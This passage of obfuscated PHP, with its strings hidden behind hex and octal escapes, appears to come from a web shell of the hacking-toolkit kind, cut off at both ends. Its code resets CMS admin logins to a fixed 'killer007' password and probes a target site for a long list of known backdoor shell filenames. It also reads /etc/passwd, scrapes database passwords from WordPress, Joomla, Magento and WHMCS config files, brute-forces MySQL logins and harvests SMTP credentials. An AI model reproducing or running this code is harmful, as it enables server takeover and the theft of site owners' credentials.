"\103\115\x53\40\x3d\x3e\40\114\157\x6b\157\155\x65\x64\151\x61\x3c\x62\x72\76"; if (preg_match("\x2f\x65\162\162\157\x72\x2c\x20\147\x61\x62\151\x73\x61\x20\x61\155\x62\x69\154\40\156\141\155\x61\x20\144\157\155\141\151\x6e\40\156\x79\x61\x2f", $url_target)) { echo $url_target2; } else { echo $url_target; } if (!$update or !$conn or !$db) { echo "\123\x74\141\164\165\x73\x20\75\x3e\x20\x3c\146\157\156\164\40\143\x6f\x6c\x6f\162\75\x72\x65\144\76" . mysql_error() . "\x3c\57\146\x6f\x6e\x74\x3e\x3c\x62\x72\x3e\74\142\162\x3e"; } else { echo "\x53\x74\141\164\x75\x73\x20\x3d\76\40\x3c\146\x6f\156\164\40\x63\157\154\157\162\75\154\x69\155\145\76\x73\165\x6b\163\145\x73\40\145\x64\151\164\40\165\163\x65\162\x2c\x20\x73\151\x6c\141\153\141\x6e\40\154\157\x67\151\156\x20\x64\145\x6e\147\x61\156\40\x75\x73\x65\162\40\46\40\x70\x61\163\x73\40\171\x61\156\147\x20\142\141\x72\x75\56\x3c\x2f\x66\x6f\156\x74\x3e\74\142\162\x3e\x3c\x62\162\76"; } mysql_close($conn); } } } } else { echo "\74\143\145\x6e\x74\145\x72\76\12\x9\x9\74\150\x31\x3e\x41\165\x74\x6f\x20\x45\144\x69\164\40\125\x73\145\162\x20\103\x6f\156\146\x69\147\74\x2f\150\x31\76\xa\11\x9\74\146\x6f\162\155\40\155\x65\x74\x68\157\144\x3d\47\160\x6f\163\164\47\76\xa\11\x9\104\111\x52\40\103\157\156\x66\151\x67\x3a\40\x3c\142\x72\76\12\x9\11\x3c\x69\156\x70\x75\164\x20\x74\x79\160\145\x3d\x27\x74\145\x78\x74\x27\x20\x73\151\172\145\75\x27\x35\60\x27\40\x6e\141\155\x65\75\47\x63\x6f\156\146\151\147\x5f\x64\151\162\x27\x20\166\x61\x6c\165\x65\75\47{$dir}\x27\x3e\74\x62\x72\76\x3c\142\x72\76\12\11\11\123\145\164\x20\125\163\145\x72\x20\46\40\x50\x61\163\x73\72\40\74\142\162\76\12\11\x9\x3c\151\x6e\160\165\x74\x20\164\171\160\x65\75\x27\164\145\x78\x74\x27\40\156\x61\x6d\x65\75\47\165\x73\145\x72\x5f\142\141\x72\x75\x27\x20\166\x61\x6c\165\x65\75\47\153\x69\x6c\x6c\x65\162\x30\60\x37\x27\x20\160\x6c\x61\143\x65\150\x6f\x6c\x64\145\162\x3d\x27\x75\163\145\162\x5f\x62\141\x72\165\x27\76\x3c\142\x72\x3e\xa\11\x9\x3c\x69\x6e\x70\165\164\x20\164\x79\160\145\x3d\x27\x74\x65\x78\164\x27\x20\x6e\141\x6d\x65\75\47\x70\141\x73\x73\137\x62\141\x72\x75\x27\40\x76\x61\x6c\165\145\75\x27\x6b\151\154\154\x65\162\60\60\x37\x27\40\x70\x6c\141\x63\145\150\157\154\144\145\162\x3d\47\160\141\163\163\137\142\x61\x72\165\x27\76\74\142\162\76\xa\x9\11\x3c\151\x6e\x70\x75\164\40\164\x79\x70\x65\x3d\47\x73\165\x62\x6d\x69\164\47\x20\156\141\155\145\x3d\x27\150\141\152\x61\162\47\x20\166\x61\154\165\x65\75\x27\x48\x61\x63\153\47\x20\163\164\x79\x6c\x65\75\x27\167\x69\144\x74\150\72\x20\62\61\x35\x70\170\73\47\76\xa\x9\11\x3c\x2f\146\157\162\155\76\xa\11\x9\x3c\163\160\x61\156\40\163\x74\x79\154\145\x3d\x27\x63\157\154\157\x72\x3a\162\145\144\x27\x3e\x49\40\x63\141\x6e\40\150\141\x63\x6b\x65\x64\40\171\157\x75\x20\151\156\40\61\x35\x20\155\151\x6e\x75\164\x65\x73\x2e\x3c\57\163\x70\x61\x6e\76\74\142\162\76\xa\x9\x9"; } } elseif ($_GET["\144\157"] == "\x73\x68\145\154\163\143\141\156") { echo "\74\x63\145\156\164\x65\162\x3e\74\x68\x32\76\x53\x68\x65\154\x6c\x20\106\151\156\144\145\x72\x3c\57\x68\x32\x3e\12\x3c\146\157\x72\x6d\40\x61\x63\164\151\x6f\156\x3d\x22\x22\40\x6d\145\x74\150\x6f\144\75\x22\x70\157\163\164\x22\x3e\12\x3c\x69\156\x70\x75\164\40\x74\171\160\x65\75\x22\x74\x65\x78\x74\x22\40\x73\x69\172\145\75\42\65\x30\42\40\x6e\141\x6d\x65\75\x22\x74\x72\x61\147\x65\164\x22\x20\166\141\154\x75\145\75\x22\150\164\164\160\72\x2f\x2f\167\167\167\x2e\x73\151\164\145\x2e\x63\157\155\57\x22\57\x3e\xa\74\142\162\x3e\xa\74\151\x6e\x70\x75\164\x20\x6e\141\155\x65\x3d\x22\x73\x63\141\x6e\42\x20\x76\141\154\165\145\75\42\123\164\x61\x72\x74\40\x53\143\x61\x6e\x69\x6e\147\42\40\x20\x73\x74\171\x6c\x65\75\42\167\151\x64\164\150\x3a\40\x32\x31\65\160\170\73\42\x20\x74\x79\160\145\x3d\x22\163\165\142\x6d\x69\x74\x22\76\12\74\57\x66\x6f\162\155\x3e\74\x62\162\x3e"; if (isset($_POST["\163\143\x61\x6e"])) { $url = $_POST["\164\x72\141\x67\145\164"]; echo "\x3c\142\162\40\x2f\76\x3c\163\x70\141\156\40\143\154\141\x73\x73\x3d\x27\x73\164\141\162\164\47\76\x53\x63\141\156\156\151\x6e\147\x20" . $url . "\74\x62\162\40\x2f\x3e\x3c\142\162\40\57\76\74\57\163\160\141\x6e\76"; echo "\122\x65\163\165\x6c\164\40\x3a\74\142\162\x20\57\x3e"; $shells = array("\127\123\117\56\160\150\x70", "\144\x7a\56\x70\x68\160", "\x63\x70\x61\156\145\154\56\160\150\x70", "\143\x70\156\56\x70\x68\x70", "\x73\x71\x6c\56\160\150\160", "\x6d\x79\x73\x71\x6c\56\x70\150\160", "\x6d\x61\x64\x73\160\x6f\164\x2e\160\x68\160", "\143\x70\x2e\x70\150\x70", "\143\x70\x62\164\56\x70\x68\160", "\x73\131\155\56\x70\x68\x70", "\x78\56\160\150\x70", "\x72\71\71\x2e\160\x68\x70", "\154\x6f\x6c\56\160\150\x70", "\152\x6f\56\160\x68\160", "\x77\160\56\160\150\160", "\x77\x68\155\x63\x73\x2e\x70\x68\160", "\x73\x68\145\154\154\x7a\x2e\160\150\160", "\144\60\x6d\141\x69\x6e\x2e\x70\150\160", "\144\60\155\141\151\156\163\56\x70\150\160", "\165\163\x65\x72\x73\x2e\x70\150\160", "\103\147\x69\x73\150\145\154\154\56\160\154", "\153\x69\x6c\154\145\162\x2e\160\150\x70", "\x63\x68\x61\156\x67\145\141\x6c\x6c\x2e\x70\150\160", "\x32\x2e\160\x68\160", "\x53\150\x33\x6c\154\x2e\x70\150\x70", "\x64\x7a\x30\56\x70\150\160", "\x64\x61\155\x2e\160\x68\160", "\x75\x73\x65\x72\x2e\160\150\160", "\x64\x6f\155\x2e\x70\x68\x70", "\167\x68\x6d\x63\x73\x2e\160\x68\160", "\x76\142\56\x7a\151\x70", "\x72\x30\x30\x74\x2e\160\x68\x70", "\143\71\x39\56\x70\150\160", "\147\x61\x7a\x61\56\x70\x68\160", "\x31\56\x70\150\x70", "\x77\160\56\x7a\x69\160" . "\x77\x70\x2d\143\x6f\x6e\164\145\x6e\x74\x2f\x70\154\165\147\151\x6e\x73\57\x64\x69\163\x71\x75\x73\55\143\157\x6d\155\145\x6e\x74\x2d\163\171\163\164\x65\x6d\x2f\x64\x69\x73\161\165\x73\x2e\160\150\160", "\x64\x30\155\x61\x69\x6e\x73\x2e\x70\x68\x70", "\167\x70\55\x63\157\x6e\164\x65\156\164\x2f\x70\154\165\147\151\x6e\x73\x2f\x61\153\151\x73\155\x65\x74\57\x61\153\151\x73\x6d\x65\x74\x2e\160\x68\160", "\155\x61\x64\163\160\x6f\x74\163\x68\145\154\154\x2e\160\x68\160", "\123\171\x6d\x2e\x70\x68\x70", "\x63\x32\x32\x2e\160\x68\x70", "\x63\x31\60\x30\56\x70\150\160", "\167\x70\x2d\x63\x6f\x6e\x74\145\x6e\164\57\160\154\165\147\x69\x6e\x73\57\141\x6b\151\163\x6d\145\164\57\141\x64\x6d\x69\x6e\56\160\x68\x70\43", "\x77\x70\55\143\157\156\164\145\x6e\164\57\160\x6c\x75\x67\x69\x6e\163\x2f\147\x6f\x6f\x67\154\x65\x2d\x73\151\164\x65\x6d\x61\160\x2d\x67\145\x6e\145\x72\x61\x74\157\162\57\163\151\164\145\155\x61\160\x2d\143\157\162\x65\56\160\x68\x70\43", "\167\160\x2d\x63\x6f\156\x74\x65\156\x74\57\160\154\165\147\x69\x6e\x73\x2f\141\153\151\163\x6d\x65\x74\x2f\167\151\x64\x67\145\x74\x2e\160\x68\x70\43", "\x43\x70\x61\156\x65\154\x2e\160\x68\x70", "\x7a\x6f\156\145\x2d\x68\x2e\160\150\x70", "\164\x6d\160\57\x75\x73\x65\162\56\x70\x68\x70", "\164\x6d\x70\x2f\x53\171\x6d\x2e\160\x68\x70", "\x63\x70\x2e\160\x68\x70", "\164\x6d\x70\x2f\x6d\141\144\x73\160\157\164\x73\150\145\154\154\56\160\150\x70", "\164\155\160\x2f\162\157\157\164\56\160\150\x70", "\x74\155\x70\57\167\x68\x6d\143\163\x2e\x70\150\160", "\x74\155\x70\x2f\151\x6e\x64\x65\170\x2e\x70\150\x70", "\164\155\160\57\x32\56\x70\150\x70", "\x74\x6d\x70\x2f\x64\172\56\x70\150\x70", "\x74\155\x70\57\x63\160\x6e\x2e\160\x68\x70", "\x74\x6d\x70\x2f\x63\150\x61\156\x67\x65\141\154\x6c\56\160\150\160", "\164\x6d\160\57\x43\147\151\163\150\x65\154\154\x2e\160\154", "\164\x6d\160\x2f\x73\161\x6c\x2e\x70\150\x70", "\x74\155\x70\x2f\x61\x64\155\x69\156\x2e\160\x68\160", "\x63\154\151\x65\x6e\164\145\57\x64\x6f\x77\x6e\x6c\x6f\141\x64\x73\x2f\x68\x34\x78\x6f\x72\x2e\160\x68\x70", "\x77\150\x6d\143\x73\x2f\x64\157\x77\x6e\154\x6f\141\144\163\57\x64\172\56\160\150\160", "\x4c\63\142\56\x70\x68\160", "\144\x2e\x70\150\x70", "\164\155\x70\x2f\144\x2e\x70\x68\160", "\164\x6d\x70\x2f\x4c\63\x62\x2e\x70\150\x70", "\167\160\55\143\157\156\164\x65\156\164\x2f\160\x6c\165\147\x69\x6e\x73\57\141\x6b\x69\163\x6d\x65\164\x2f\141\x64\x6d\151\x6e\x2e\x70\x68\160", "\164\145\155\160\x6c\141\x74\145\163\x2f\162\150\x75\153\137\155\x69\x6c\153\x79\167\141\171\57\151\x6e\x64\x65\x78\x2e\x70\150\x70", "\164\145\155\160\154\141\x74\145\x73\x2f\142\145\145\x7a\x2f\x69\156\x64\x65\x78\x2e\x70\150\x70", "\x61\x64\x6d\151\x6e\61\56\160\x68\x70", "\x75\x70\154\x6f\141\144\56\x70\150\x70", "\165\x70\x2e\160\150\x70", "\x76\x62\x2e\x7a\151\x70", "\x76\142\56\x72\141\162", "\141\x64\155\x69\156\62\56\141\163\160", "\165\x70\154\157\x61\144\163\x2e\x70\150\x70", "\163\141\56\x70\150\x70", "\163\x79\163\x61\x64\155\x69\x6e\163\57", "\x61\144\x6d\151\156\x31\57", "\141\144\x6d\x69\x6e\151\163\x74\162\x61\164\151\x6f\156\57\123\x79\x6d\56\x70\150\x70", "\151\x6d\141\147\x65\163\57\x53\x79\155\x2e\x70\x68\x70", "\x2f\x72\65\x37\x2e\x70\150\x70", "\57\x77\x70\55\x63\x6f\156\x74\145\x6e\164\x2f\x70\x6c\165\147\x69\x6e\x73\57\x64\x69\163\x71\x75\x73\x2d\x63\157\x6d\x6d\x65\x6e\164\x2d\x73\171\x73\164\x65\x6d\x2f\x64\x69\x73\161\x75\163\x2e\160\x68\x70", "\57\163\150\x65\x6c\x6c\56\160\x68\160", "\x2f\163\141\56\160\150\160", "\x2f\141\x64\x6d\151\x6e\56\x70\x68\160", "\57\163\x61\x32\56\160\150\x70", "\x2f\x32\56\x70\x68\x70", "\x2f\x67\x61\x7a\x61\56\x70\x68\x70", "\57\165\x70\x2e\160\x68\x70", "\x2f\165\x70\x6c\157\141\x64\x2e\x70\x68\x70", "\x2f\165\160\x6c\157\141\x64\163\56\x70\x68\160", "\x2f\164\145\x6d\x70\154\141\164\145\x73\57\142\x65\145\x7a\57\151\156\144\x65\x78\56\x70\x68\160", "\x73\x68\x65\x6c\154\x2e\x70\x68\x70", "\57\141\x6d\x61\x64\x2e\x70\x68\x70", "\57\164\x30\x30\x2e\160\150\160", "\x2f\x64\172\56\x70\150\x70", "\x2f\163\151\164\x65\x2e\x72\x61\x72", "\x2f\102\x6c\x61\143\153\56\x70\150\160", "\x2f\163\151\164\x65\56\164\141\x72\56\147\x7a", "\x2f\x68\157\155\145\x2e\x7a\151\x70", "\x2f\x68\x6f\155\145\56\x72\141\162", "\57\x68\x6f\x6d\145\x2e\164\x61\x72", "\57\150\x6f\155\145\x2e\164\x61\x72\x2e\x67\x7a", "\x2f\146\x6f\162\165\155\x2e\172\151\160", "\x2f\146\x6f\162\165\155\56\x72\141\x72", "\x2f\146\157\x72\x75\x6d\x2e\x74\141\162", "\x2f\x66\x6f\162\165\x6d\x2e\164\141\x72\56\x67\172", "\57\x74\145\163\164\56\164\170\164", "\57\146\164\160\x2e\164\170\x74", "\x2f\x75\163\x65\x72\56\x74\170\164", "\57\163\x69\x74\x65\x2e\x74\x78\x74", "\57\145\162\x72\157\162\137\154\x6f\x67", "\x2f\x65\x72\162\x6f\162", "\x2f\143\160\x61\x6e\x65\x6c", "\57\x61\167\x73\164\141\x74\163", "\x2f\163\x69\164\145\x2e\x73\161\x6c", "\x2f\166\142\x2e\163\x71\x6c", "\57\x66\x6f\162\x75\155\x2e\163\161\154", "\x2f\142\x61\143\x6b\x75\x70\x2e\x73\x71\154", "\57\142\x61\143\x6b\56\163\161\x6c", "\57\x64\141\164\x61\56\163\x71\x6c", "\167\x70\56\162\x61\x72\57", "\167\x70\55\143\x6f\156\164\x65\156\164\57\160\154\x75\147\x69\x6e\163\x2f\144\151\x73\x71\165\x73\x2d\x63\157\155\x6d\145\x6e\x74\x2d\163\x79\163\x74\145\x6d\x2f\x64\151\x73\x71\165\x73\56\160\x68\160", "\x61\x73\160\x2e\141\x73\x70\x78", "\x2f\164\145\x6d\x70\x6c\141\164\x65\163\x2f\x62\145\x65\x7a\57\x69\x6e\144\x65\x78\56\160\150\x70", "\x74\155\x70\57\x76\141\147\141\x2e\x70\150\x70", "\x74\x6d\x70\57\x6b\151\154\x6c\x65\x72\x2e\x70\150\160", "\x77\x68\155\143\163\56\160\150\160", "\x74\x6d\160\57\153\x69\x6c\x6c\x65\162\56\x70\x68\160", "\164\155\160\x2f\x64\x6f\x6d\141\x69\x6e\x65\x2e\160\x6c", "\x74\155\x70\x2f\144\157\155\x61\151\x6e\x65\56\x70\x68\160", "\x75\x73\145\x72\x61\x64\155\151\x6e\57", "\164\155\160\57\x64\60\x6d\x61\151\156\x65\56\160\150\160", "\144\x30\155\141\x69\156\x65\x2e\x70\150\160", "\x74\x6d\x70\57\163\161\154\x2e\x70\150\x70", "\164\155\160\57\x64\172\x31\x2e\160\x68\x70", "\x64\x7a\61\56\160\150\160", "\x66\x6f\162\165\x6d\x2e\172\x69\160", "\123\x79\x6d\x6c\151\156\153\56\160\150\160", "\123\x79\x6d\x6c\x69\156\153\56\x70\x6c", "\x66\x6f\x72\x75\155\x2e\162\141\162", "\x6a\157\157\155\154\141\x2e\x7a\x69\160", "\x6a\157\157\155\154\x61\56\162\x61\162", "\x77\160\56\x70\x68\160", "\x62\165\143\153\56\x73\161\x6c", "\x73\171\163\141\144\x6d\x69\x6e\x2e\160\150\x70", "\x69\x6d\141\147\145\163\x2f\143\x39\x39\x2e\160\x68\160", "\x78\x64\x2e\x70\x68\x70", "\x63\x31\x30\x30\56\x70\x68\160", "\x73\x70\x79\x2e\141\x73\x70\170", "\170\x64\56\160\150\x70", "\164\x6d\x70\57\170\x64\x2e\x70\x68\x70", "\x73\171\x6d\57\x72\x6f\157\x74\x2f\x68\x6f\x6d\145\57", "\x62\x69\x6c\x6c\151\156\x67\x2f\x6b\151\x6c\x6c\x65\162\x2e\x70\150\160", "\x74\x6d\160\57\165\x70\154\x6f\141\x64\56\160\x68\160", "\x74\x6d\x70\57\141\x64\x6d\x69\x6e\x2e\x70\150\x70", "\123\x65\162\x76\x65\162\x2e\x70\x68\160", "\x74\x6d\x70\57\165\160\154\x6f\141\144\163\56\x70\x68\160", "\164\x6d\160\x2f\165\160\56\160\150\x70", "\123\145\x72\166\x65\x72\x2f", "\167\x70\x2d\141\144\155\151\x6e\57\x63\x39\71\x2e\x70\150\x70", "\164\155\x70\x2f\x70\162\x69\x76\70\56\160\150\160", "\160\162\151\166\70\x2e\160\x68\160", "\x63\147\x69\x2e\160\154\57", "\x74\x6d\160\57\143\147\151\56\160\154", "\x64\x6f\x77\x6e\x6c\157\x61\x64\x73\x2f\x64\157\155\x2e\160\x68\160", "\x74\145\155\160\x6c\141\x74\x65\163\57\152\141\55\x68\x65\x6c\x69\x6f\55\x66\x61\x72\x73\x69\57\151\x6e\144\x65\170\56\x70\150\x70", "\167\145\x62\x61\144\155\x69\156\x2e\x68\x74\155\154", "\x61\x64\x6d\151\156\163\56\160\150\160", "\57\x77\160\55\x63\157\x6e\x74\145\x6e\x74\x2f\x70\154\x75\147\x69\x6e\x73\x2f\143\157\165\156\164\x2d\160\145\162\55\144\141\x79\57\152\x73\57\171\x63\57\144\x30\x30\x2e\160\x68\x70", "\141\x64\x6d\x69\x6e\163\x2f", "\x61\x64\155\151\x6e\x73\56\x61\x73\x70", "\141\x64\155\151\156\163\x2e\x70\150\160", "\167\x70\x2e\172\151\x70", "\x77\x73\157\x32\56\x35\x2e\x31", "\x70\141\163\151\162\x2e\x70\150\x70", "\x70\141\x73\151\162\x32\56\160\x68\x70", "\x75\x70\56\x70\150\x70", "\x63\157\153\x2e\160\150\160", "\156\145\167\146\151\x6c\x65\56\160\x68\x70", "\x75\x70\154\56\x70\x68\x70", "\56\x70\150\x70", "\141\x2e\160\x68\x70", "\x63\162\157\164\x2e\x70\x68\160", "\153\157\156\x74\x6f\x6c\56\160\x68\x70", "\150\x6d\145\x69\67\56\160\150\160", "\152\145\x6d\142\165\164\x2e\160\150\x70", "\x6d\145\155\x65\x6b\x2e\x70\150\x70", "\164\141\x69\x2e\160\x68\x70", "\x72\141\142\x69\164\x2e\160\150\x70", "\x69\x6e\144\157\170\160\x6c\x6f\x69\x74\x2e\x70\x68\x70", "\141\56\160\x68\x70", "\150\x65\x6d\142\x2e\160\x68\160", "\x68\x61\x63\153\x2e\x70\150\160", "\147\x61\x6c\x61\165\56\160\x68\x70", "\110\x73\x48\x2e\x70\150\160", "\x69\156\144\157\130\160\x6c\x6f\x69\x74\x2e\x70\x68\160", "\x61\x73\x75\56\160\x68\160", "\167\x73\157\56\160\150\160", "\154\157\x6c\56\x70\x68\160", "\x69\144\x78\56\x70\150\160", "\162\x61\142\142\x69\164\56\x70\x68\160", "\61\156\x37\63\x63\x74\x69\157\156\56\x70\150\160", "\x6b\x2e\160\150\160", "\155\141\x69\154\145\x72\x2e\160\150\x70", "\x6d\141\x69\154\56\x70\150\x70", "\164\x65\155\x70\x2e\x70\x68\x70", "\x63\56\160\x68\160", "\144\56\x70\150\x70", "\111\x44\x42\56\x70\150\x70", "\x69\156\x64\157\56\x70\x68\160", "\x69\156\144\157\156\x65\163\151\141\56\160\x68\x70", "\x73\x65\x6d\x76\x61\153\x2e\x70\x68\160", "\156\144\x61\x73\155\165\x2e\160\x68\x70", "\143\157\x78\56\160\x68\x70", "\141\x73\56\160\x68\x70", "\x61\x64\56\x70\150\x70", "\x61\x61\56\x70\x68\x70", "\x66\151\154\x65\x2e\160\x68\x70", "\160\145\152\x75\x2e\x70\150\x70", "\x61\163\x64\56\x70\x68\x70", "\x63\157\156\x66\151\x67\x73\x2e\160\150\x70", "\141\x73\163\x2e\160\x68\160", "\172\x2e\x70\150\x70"); foreach ($shells as $shell) { $headers = get_headers("{$url}{$shell}"); if (eregi("\62\x30\x30", $headers[0])) { echo "\74\141\40\x68\x72\x65\x66\x3d\x27{$url}{$shell}\x27\x3e{$url}{$shell}\x3c\57\x61\x3e\40\x3c\163\160\x61\x6e\40\143\x6c\141\x73\163\x3d\x27\146\x6f\165\156\144\x27\76\104\x6f\156\x65\x20\72\104\74\57\x73\x70\x61\x6e\76\x3c\142\x72\40\x2f\76\x3c\x62\x72\x2f\76\74\x62\162\57\x3e"; $dz = fopen("\163\150\145\154\154\x73\56\x74\x78\164", "\x61\x2b"); $suck = "{$url}{$shell}"; fwrite($dz, $suck . "\12"); } } echo "\x53\150\x65\x6c\154\40\x5b\x20\74\141\40\150\162\145\146\x3d\47\56\x2f\163\150\145\x6c\x6c\x73\56\164\x78\164\47\40\164\x61\162\147\145\x74\75\x27\137\142\154\141\x6e\x6b\47\76\x73\150\145\x6c\x6c\163\56\x74\170\164\x3c\x2f\x61\x3e\x20\135\74\x2f\163\x70\x61\x6e\76"; } } elseif ($_GET["\x64\x6f"] == "\143\x70\141\156\145\x6c") { if ($_POST["\x63\162\141\143\153"]) { $usercp = explode("\xd\12", $_POST["\x75\163\x65\x72\x5f\x63\160"]); $passcp = explode("\15\12", $_POST["\160\141\163\x73\137\143\160"]); $i = 0; foreach ($usercp as $ucp) { foreach ($passcp as $pcp) { if (@mysql_connect("\x6c\x6f\x63\141\154\150\x6f\x73\x74", $ucp, $pcp)) { if ($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "\x31"; $_SESSION[$pcp] = "\x31"; $i++; echo "\x75\163\x65\162\156\x61\155\145\40\x28\74\146\x6f\x6e\x74\x20\143\x6f\154\x6f\162\75\x6c\151\x6d\x65\76{$ucp}\74\x2f\146\x6f\x6e\x74\76\51\40\160\141\163\x73\167\x6f\162\x64\40\x28\74\146\157\156\164\40\143\157\154\x6f\162\75\154\x69\155\145\x3e{$pcp}\74\x2f\x66\x6f\156\x74\76\x29\x3c\x62\x72\x3e"; } } } } if ($i == 0) { } else { echo "\74\142\x72\76\116\145\x6d\165\40" . $i . "\x20\x43\160\x61\x6e\x65\x6c\40\142\x79\40\74\x66\157\x6e\x74\x20\x63\x6f\x6c\157\162\75\x6c\x69\155\145\x3e\x4a\141\156\x43\157\170\x3c\x2f\146\157\x6e\x74\76"; } } else { echo "\x3c\143\145\156\x74\x65\162\76\xa\x9\x9\74\146\x6f\x72\155\40\x6d\x65\x74\x68\157\x64\75\47\x70\157\163\x74\47\76\12\11\11\125\x53\105\x52\x3a\40\x3c\142\x72\x3e\xa\11\x9\74\x74\145\x78\164\141\x72\x65\x61\40\x73\x74\171\x6c\x65\75\47\167\x69\144\x74\x68\72\x20\x34\x35\60\160\x78\73\x20\x68\145\151\147\150\164\x3a\x20\x31\65\60\x70\x78\x3b\x27\x20\156\x61\155\145\x3d\47\165\x73\x65\x72\137\x63\x70\47\76"; $_usercp = fopen("\x2f\145\x74\143\57\x70\x61\x73\x73\x77\x64", "\162"); while ($getu = fgets($_usercp)) { if ($getu == '' || !$_usercp) { echo "\x3c\146\157\156\x74\40\x63\157\x6c\x6f\162\75\x72\145\144\x3e\103\141\156\47\x74\x20\162\x65\x61\144\x20\x2f\145\164\x63\x2f\x70\141\x73\x73\167\144\x3c\57\x66\x6f\x6e\164\76"; } else { preg_match_all("\57\50\x2e\52\77\x29\72\170\72\57", $getu, $u); foreach ($u[1] as $user_cp) { if (is_dir("\x2f\x68\157\155\x65\57{$user_cp}\57\x70\165\142\x6c\151\x63\x5f\150\x74\155\x6c")) { echo "{$user_cp}\xa"; } } } } echo "\74\x2f\164\145\x78\x74\x61\x72\145\141\76\x3c\x62\x72\76\12\x9\11\x50\101\123\123\72\40\x3c\x62\162\76\xa\x9\11\74\164\x65\x78\164\x61\x72\x65\141\40\163\x74\x79\154\145\75\47\x77\x69\x64\x74\x68\72\x20\x34\x35\60\160\170\73\40\150\145\x69\x67\150\x74\x3a\x20\62\60\x30\x70\170\73\47\40\156\x61\x6d\145\75\47\x70\141\x73\x73\x5f\x63\x70\47\x3e"; function cp_pass($dir) { $pass = ''; $dira = scandir($dir); foreach ($dira as $dirb) { if (!is_file("{$dir}\x2f{$dirb}")) { continue; } $ambil = file_get_contents("{$dir}\x2f{$dirb}"); if (preg_match("\57\x57\x6f\x72\144\x50\x72\x65\x73\163\x2f", $ambil)) { $pass .= ambilkata($ambil, "\x44\102\137\x50\x41\123\x53\127\x4f\122\104\x27\54\x20\x27", "\x27") . "\12"; } elseif (preg_match("\x2f\112\103\157\x6e\146\151\x67\174\152\x6f\x6f\x6d\x6c\x61\x2f", $ambil)) { $pass .= ambilkata($ambil, "\160\x61\163\x73\167\x6f\x72\x64\x20\x3d\x20\x27", "\47") . "\xa"; } elseif (preg_match("\57\115\141\147\x65\156\164\x6f\174\115\141\147\x65\x5f\x43\157\x72\145\x2f", $ambil)) { $pass .= ambilkata($ambil, "\x3c\160\x61\x73\x73\167\x6f\162\x64\76\74\41\133\103\104\x41\124\x41\133", "\x5d\x5d\x3e\x3c\57\160\x61\163\x73\x77\157\162\144\x3e") . "\xa"; } elseif (preg_match("\x2f\160\141\156\147\x67\x69\x6c\x20\146\165\156\147\163\x69\x20\x76\141\x6c\151\144\141\163\x69\x20\x78\x73\x73\x20\x64\x61\x6e\40\x69\156\x6a\x65\143\x74\151\x6f\x6e\x2f", $ambil)) { $pass .= ambilkata($ambil, "\x70\x61\x73\x73\x77\x6f\162\144\40\x3d\x20\42", "\42") . "\12"; } elseif (preg_match("\57\x48\124\124\120\137\123\x45\122\x56\105\122\174\x48\124\124\x50\x5f\103\x41\124\101\x4c\117\107\174\104\x49\122\137\103\x4f\x4e\106\111\x47\x7c\x44\111\122\x5f\123\131\x53\124\x45\115\x2f", $ambil)) { $pass .= ambilkata($ambil, "\x27\104\102\137\120\x41\x53\123\x57\x4f\x52\104\x27\x2c\40\x27", "\x27") . "\12"; } elseif (preg_match("\x2f\143\x6c\x69\x65\x6e\164\x2f", $ambil)) { preg_match("\x2f\160\141\x73\163\x77\x6f\162\144\x3d\x28\x2e\x2a\x29\57", $ambil, $pass1); if (preg_match("\x2f\42\x2f", $pass1[1])) { $pass1[1] = str_replace("\42", '', $pass1[1]); $pass .= $pass1[1] . "\12"; } } elseif (preg_match("\x2f\x63\x63\137\x65\x6e\x63\162\x79\160\164\151\157\x6e\137\x68\x61\x73\150\57", $ambil)) { $pass .= ambilkata($ambil, "\x64\x62\137\x70\141\163\x73\167\x6f\162\x64\40\75\40\47", "\47") . "\xa"; } } echo $pass; } $cp_pass = cp_pass($dir); echo $cp_pass; echo "\x3c\x2f\x74\145\170\164\x61\162\145\x61\76\74\x62\162\x3e\12\x9\11\x3c\151\156\160\165\x74\x20\164\x79\160\145\75\47\163\x75\142\x6d\151\164\x27\x20\x6e\x61\155\x65\75\x27\x63\x72\141\143\x6b\x27\40\163\x74\x79\154\x65\75\47\167\151\x64\164\x68\x3a\x20\x34\x35\60\x70\170\73\47\40\166\141\x6c\165\x65\x3d\x27\103\x72\x61\x63\153\x27\x3e\xa\x9\x9\74\57\146\157\x72\155\x3e\xa\11\x9\x3c\x73\x70\x61\156\76\x2f\x44\157\40\x79\x6f\x75\40\x6b\156\157\167\40\167\x68\x6f\x20\151\x73\x20\153\x69\154\x6c\145\162\60\x30\x37\x3c\57\x73\160\x61\156\76\74\x62\x72\x3e\74\57\x63\145\x6e\164\145\162\76"; } } elseif ($_GET["\x64\157"] == "\163\x6d\x74\x70") { echo "\x3c\x63\145\x6e\164\x65\162\x3e\x3c\163\x70\x61\x6e\x20\163\x74\x79\154\x65\x3d\47\143\x6f\154\x6f\162\x3a\x72\145\x64\47\x3e\111\146\40\171\157\x75\x20\167\141\156\x74\x20\x74\x6f\x20\x72\x6f\x6f\x74\40\x74\150\x65\x20\163\x65\162\166\x65\162\x2c\145\x6e\165\x6d\x65\162\x61\x74\x69\x6f\x6e\x20\x69\x73\40\x6b\145\x79\56\107\x6f\40\141\156\144\x20\146\x69\156\144\x20\154\x73\145\40\x73\x63\162\151\160\164\x20\157\156\x20\147\x6f\157\147\x6c\145\74\x2f\x73\160\x61\156\76\74\x2f\143\x65\x6e\x74\145\162\x3e\x3c\142\162\x3e"; function scj($dir) { $dira = scandir($dir); foreach ($dira as $dirb) { if (!is_file("{$dir}\x2f{$dirb}")) { continue; } $ambil = file_get_contents("{$dir}\x2f{$dirb}"); $ambil = str_replace("\x24", '', $ambil); if (preg_match("\57\x4a\x43\x6f\156\x66\x69\x67\x7c\152\157\157\155\x6c\141\x2f", $ambil)) { $smtp_host = ambilkata($ambil, "\x73\155\x74\160\x68\x6f\163\164\x20\x3d\x20\x27", "\x27"); $smtp_auth = ambilkata($ambil, "\x73\x6d\164\x70\141\165\164\150\x20\x3d\40\x27", "\x27"); $smtp_user = ambilkata($ambil, "\x73\155\x74\x70\165\163\145\x72\40\x3d\x20\x27", "\47"); $smtp_pass = ambilkata($ambil, "\x73\155\x74\160\x70\141\163\x73\40\75\x20\x27", "\47"); $smtp_port = ambilkata($ambil, "\163\x6d\164\160\x70\157\162\x74\x20\x3d\40\x27", "\47"); $smtp_secure = ambilkata($ambil, "\163\x6d\164\160\163\x65\x63\x75\x72\x65\x20\75\x20\47", "\47"); echo "\123\x4d\124\120\x20\110\x6f\x73\164\72\40\74\x66\x6f\156\164\x20\x63\157\x6c\x6f\162\75\x6c\x69\x6d\145\76{$smtp_host}\74\57\x66\x6f\156\x74\x3e\x3c\142\162\x3e"; echo 